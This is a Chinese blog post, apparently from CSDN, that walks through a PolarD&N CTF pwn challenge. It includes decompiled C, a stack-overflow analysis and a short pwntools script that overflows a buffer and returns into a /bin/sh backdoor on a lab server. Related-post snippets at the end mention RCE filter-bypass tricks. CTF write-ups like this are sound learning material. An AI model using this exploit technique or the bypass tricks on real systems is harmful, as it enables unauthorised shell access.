PolarD&N_PWN_Choice

最新推荐文章于 2024-07-23 14:36:35 发布
最新推荐文章于 2024-07-23 14:36:35 发布
阅读量194 收藏
点赞数
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kuluha/article/details/133823430
版权

拿到文件先checksec一下

发现文件为64位,且开启NX保护

再看看idea

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [rsp+Ch] [rbp-4h] BYREF

  init(argc, argv, envp);
  puts(&s);
  puts("Menu:");
  puts(a1);
  puts(a2);
  puts(a3);
  __isoc99_scanf((__int64)&unk_400A75, (__int64)&v4);
  if ( v4 == 1 )
  {
    Data1();
  }
  else if ( v4 == 2 )
  {
    Data2();
  }
  else
  {
    Data3();
  }
  return 0;
}
int Data1()
{
  char buf[48]; // [rsp+0h] [rbp-30h] BYREF

  puts(&byte_400A78);
  read(0, buf, 0x35uLL);
  return printf(&format);
}

 

int Data2()
{
  char buf[48]; // [rsp+0h] [rbp-30h] BYREF

  puts(&byte_400AA8);
  read(0, buf, 0x35uLL);
  return printf(&format);
}

 

int Data3()
{
  char buf[48]; // [rsp+0h] [rbp-30h] BYREF

  puts(&byte_400AD0);
  read(0, buf, 0x50uLL);
  return printf(&format);
}

在主函数中我们发现三个选项,分别为Data1/2/3,我们分别点开函数发现,三者中唯有Data3存在足够的溢出可以使我们进一步操作。

同时我们发现函数中存在后门函数shell

int Shell()
{
  return system("/bin/sh");
}

那么,这道题的大致思路已经明了

1、选择Data3(见ps)

2、构造栈溢出

3、getshell

那么久直接开始写脚本吧

exp:

from pwn import*
r = remote("123.60.135.228",2144)
r.sendline("9")
shell = 0x004007bd
payload = 'a' * 48 + 'a' * 8
payload += p64(shell)
r.sendline(payload)
r.interactive()

运行脚本后,选择咱们的溢出点3,然后执行cat flag,即可获得flag

PS:怎么选择Data3呢,感觉在好多人眼里这是一个再简单不过的问题,但是在以前这个问题难倒了我好一阵,所以,我选择在这里开一个小讲堂帮助一下那些跟我一样不知道也不敢问的家人们,大家可以各取所需

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [rsp+Ch] [rbp-4h] BYREF

  init(argc, argv, envp);
  puts(&s);
  puts("Menu:");
  puts(a1);
  puts(a2);
  puts(a3);
  __isoc99_scanf((__int64)&unk_400A75, (__int64)&v4);
  if ( v4 == 1 )
  {
    Data1();
  }
  else if ( v4 == 2 )
  {
    Data2();
  }
  else
  {
    Data3();
  }
  return 0;
}

我们可以看见,我们是依靠if函数来决定我们选择哪一个Data。而我们通过scanf函数来输入数据,从而改变v4的值,来实现选择。当v4等于1时,选择Data1,当v4等于2时,选择Data2,如果v4不等用于1或2,则执行Data3.那么我们只要通过向scanf发送不等于1或2的数,就可以执行Data3。

例:

r.sendline("9")

Kuluha
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
PolarD&N(简单rce)
果粒程
04-16 523
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-i7IKevHK-1681605902192)(D:\网安笔记\图片\image-20230415190913908.png)]
polar靶场通关笔记
weixin_43296565的博客
06-06 5236
这里是关于自己打polar靶场的小笔记
[BMZCTF-pwn] 24-pwn2
weixin_52640415的博客
02-16 171
第二题是个栈溢出的题,也属于白送的那种,程序直接调用check在check里向48字节的空间写入0x400,导致栈溢出。而且没有canary没开pie这样就能直接通过溢出 int check() { char buf[48]; // [rsp+0h] [rbp-30h] BYREF read(0, buf, 0x400uLL); return strcmp(buf, "21232F297A57A5A743894A0E4A801FC3"); } 思路就是先通过溢出调用puts(got[pu
[黑盾CTF 2023] secret_message 复现
weixin_52640415的博客
05-25 1103
利用alarm造syscall,利用read填充rax实现syscall(0x3b) execv
[XXX]不知道是啥比赛,放在群里的附件
weixin_52640415的博客
07-10 408
这题是脑筋急转弯,给了10次猜,虽然有随机数,但你可以猜同一个,错了还会保存数。两次rsa,可以根据leak1=(p2+q2)>>400求出得到p2,q2,然后求出leak2,再根据leak2求p1。主程序部分作了SMC,需要把这一段函数异或0xc3解密,IDA才能看。加密部分,是tea加密,还是见得少,见多了一眼就能看出来。虽然都不复杂,可这两个模板不是大众型的,有必要存好。三部分,主体有密钥,然后 init和异或加密,RC4。这个居然没作出来,问了群友,原来把题目的+=看成=了。
基于Matlab绘制风向与风速的关系图.zip
02-08
3. **polard2cart.m**:这个函数可能是将极坐标(Polar Coordinates)转换为直角坐标(Cartesian Coordinates)的自定义实现。在处理风向数据时,风向通常以角度表示(极坐标),而风速则可能作为径向距离(也是极...
matlab开发-垂直风速方向
08-27
`polard2cart.m` 可能是转换函数,将极坐标(角度和半径)转换为笛卡尔坐标(x和y)。在处理风向数据时,这种转换可能很有用,因为它允许在直角坐标系统中进行进一步的计算和可视化。 `winddata.txt` 文件包含了...
PolarD&N-CTF-web方向-简单
J1ng_Hong的博客
12-06 2593
所以bp的方法就不行了。然后源码看了好久都没找到id=9的地方,并且我还尝试传入id这个参数。post传参一个yyds=666,这是不会被检测的。这就是说我们需要post一个名为xdmtql的变量,然后这个变量不能是数组。然后发现有一个index.php,然后发现根目录有一个flag的文件。然后发现了一个叫做/.index.php.swp的备份文件。这就说明,如果换行符应该是不会被检测的。虽然很多乱码,但是flag还是包含在里面的。要匹配 . ,请使用 \.。然后就得到了flag。然后就得到了flag。
PHP-RCE绕过的姿势总结
有时候,想要一块二向箔
02-18 7953
一、命令执行空格过滤取反绕过命令分隔符黑名单绕过(比如flag字符)拼接二、代码执行总结参考文章 前言 做了很多的题目,静下心来学习大佬做点小总结 一、命令执行 空格过滤 < 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 取反绕过 取反两次就可以得到想要绕过限制的数据 传参时 ?code=(~%8F%97%8F%96%91%99%90)(); 在做NSS平台上的一道rce题目就是用到类似的思路,
Polar_D&N[MISC]大礼包
m0_73720466的博客
10-15 107
因为flag格式是flag{},想到栅栏密码对其进行解密(https://www.qqxiuzi.cn/bianma/zhalanmima.php)1) 根据加密压缩包的注释得出密码是6位以上,用ARCHPR工具限定纯数字,7-8位爆破得到密码“9635421”在图片尾部得到一串base32,解码得到base64,再解码后得到明文sn{bvr1_0yytcyp_fp0}得到synt{cbyvpr_1f_p00y},再解一次凯撒密码(移位数是13)得到flag。
[PolarD&N]题解——03ret2syscall_32
2301_80238613的博客
10-13 175
决定利用gets()函数的溢出,去构造execve("/bin/sh", 0, 0)。存在ebx,ecx,edx连续的寄存器,选取连续的即可。题目名称:03ret2syscall_32。题目来源:PolarD&N靶场(是一个32位静态的题目!如有错误欢迎大佬指正!
polar CTF 简单rce
samRsa
01-03 655
polar CTF 简单rce 【代码】polar CTF 简单rce。
PolarD&N靶场题解
qq_43423311的博客
03-23 2565
PolarD&N CTF靶场。
PHP是世界上最好的语言-PolarD&N XXF无参数RCE QUERY_STRING 特性
m0_64180167的博客
12-17 489
这个靶场我之前看到过打广告,而且感觉比较新 来坐坐这里还是。
PolarD&N-CTF-web方向-中等
J1ng_Hong的博客
12-12 1630
(由于发现中等题里面有许多新的知识点,所以特意拉了一个新的博客来展示)
ROP;Ret2libc应用详解;CTF-pwn writeup;pwntools,one_gadget应用
CHERRY_cong的博客
05-01 625
ROP;Ret2libc; CTF-pwn题writeup;pwntools,one_gadget解题 pwn1 逆向代码 // IDA 7.5 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[48]; // [rsp+0h] [rbp-30h] BYREF init(); puts("Show me your code :D"); gets(buf, argv); return 0
使用Python的Turtle库绘制动态风车
爱写代码的小朋友
07-20 409
python绘制风车
随机数种子的作用
最新发布
帆的博客
07-23 664
设置随机数种子(random seed)的目的是为了确保随机数生成器在每次运行时产生相同的随机数序列,从而保证实验结果的一致性。随机数种子通过初始化随机数生成器的内部状态,使得在相同的种子值下,随机数生成器每次调用时生成的序列是相同的。
Java-Lambda
lizhiwei21的博客
07-21 408
lambda表达式可以理解为对匿名内部类的一种简化 , 但是本质是有区别的面向对象思想 :强调的是用对象去完成某些功能函数式编程思想 :强调的是结果 , 而不是怎么去做。
批量下载网易云音乐歌单的Python脚本
qq_43580271的博客
07-17 1351
同时,这也展示了如何利用Python在日常生活中解决实际问题的能力,希望这个小技巧对你有所帮助!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值